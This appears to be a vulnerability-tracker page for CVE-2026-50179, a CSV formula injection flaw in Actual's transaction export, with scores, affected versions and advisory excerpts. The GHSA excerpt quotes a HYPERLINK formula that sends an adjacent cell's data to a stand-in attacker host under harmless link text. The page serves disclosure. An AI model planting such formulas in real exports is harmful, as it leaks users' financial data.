CVE-2026-50179
published 2026-07-07CVE-2026-50179: Actual is a local-first personal finance tool. Prior to 26.6.0, exportToCSV and exportQueryToCSV in…
PriorityP419medium4.2CVSS 3.1
AVNACHPRNUIRSUCLILAN
EPSS
0.29%
21.4th percentile
Actual is a local-first personal finance tool. Prior to 26.6.0, exportToCSV and exportQueryToCSV in packages/loot-core/src/server/transactions/export/export-to-csv.ts pass user-controlled Payee, Notes, Account, and Category strings to csv-stringify with no cast callback and no formula-prefix neutralization. Strings that begin with equals sign, plus, minus, at sign, tab, or carriage return survive verbatim into the exported CSV, and when a recipient opens the file in Excel, LibreOffice Calc, or Google Sheets, the strings are interpreted as formulas, enabling transaction data exfiltration and attacker-chosen spreadsheet display values. This issue is fixed in version 26.6.0.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| actual-app | web | >= 0 < 26.6.0 | 26.6.0 |
| actualbudget | actual | < 26.6.0 | 26.6.0 |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
VulDB
actualbudget Actual up to 26.5.x CSV Export export-to-csv.ts exportToCSV/exportQueryToCSV Payee/Notes/Account/Category neutralization
vuldb·2026-07-08·CVSS 4.2
CVE-2026-50179 [MEDIUM] actualbudget Actual up to 26.5.x CSV Export export-to-csv.ts exportToCSV/exportQueryToCSV Payee/Notes/Account/Category neutralization
A vulnerability classified as problematic has been found in actualbudget Actual up to 26.5.x. Impacted is the function exportToCSV/exportQueryToCSV of the file packages/loot-core/src/server/transactions/export/export-to-csv.ts of the component CSV Export Handler. This manipulation of the argument Payee/Notes/Account/Category causes improper neutralization.
This vulnerability is handled as CVE-2026-50179. It is possible to launch the attack on the local host. There is not any exploit available.
GHSA
@actual-app/web has CSV Formula Injection in Transaction Export via Imported Payee/Notes Fields
ghsa·2026-06-22
CVE-2026-50179 [MEDIUM] CWE-1236 @actual-app/web has CSV Formula Injection in Transaction Export via Imported Payee/Notes Fields
@actual-app/web has CSV Formula Injection in Transaction Export via Imported Payee/Notes Fields
## Summary
`exportToCSV` and `exportQueryToCSV` in `packages/loot-core/src/server/transactions/export/export-to-csv.ts` pass user-controlled `Payee`, `Notes`, `Account`, and `Category` strings to `csv-stringify` with no `cast` callback and no formula-prefix neutralization. Strings that begin with `=`, `+`, `-`, `@`, tab, or carriage return survive verbatim into the exported CSV. When the victim (or anyone they share the export with) opens the file in Excel, LibreOffice Calc, or Google Sheets, the strings are interpreted as formulas. `=HYPERLINK("http://attacker/?leak="&B2,"Bank refund")` is the most reliable variant: it renders as a clickable link with benign text and exfiltrates adjacent cell
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
2026-07-07
Published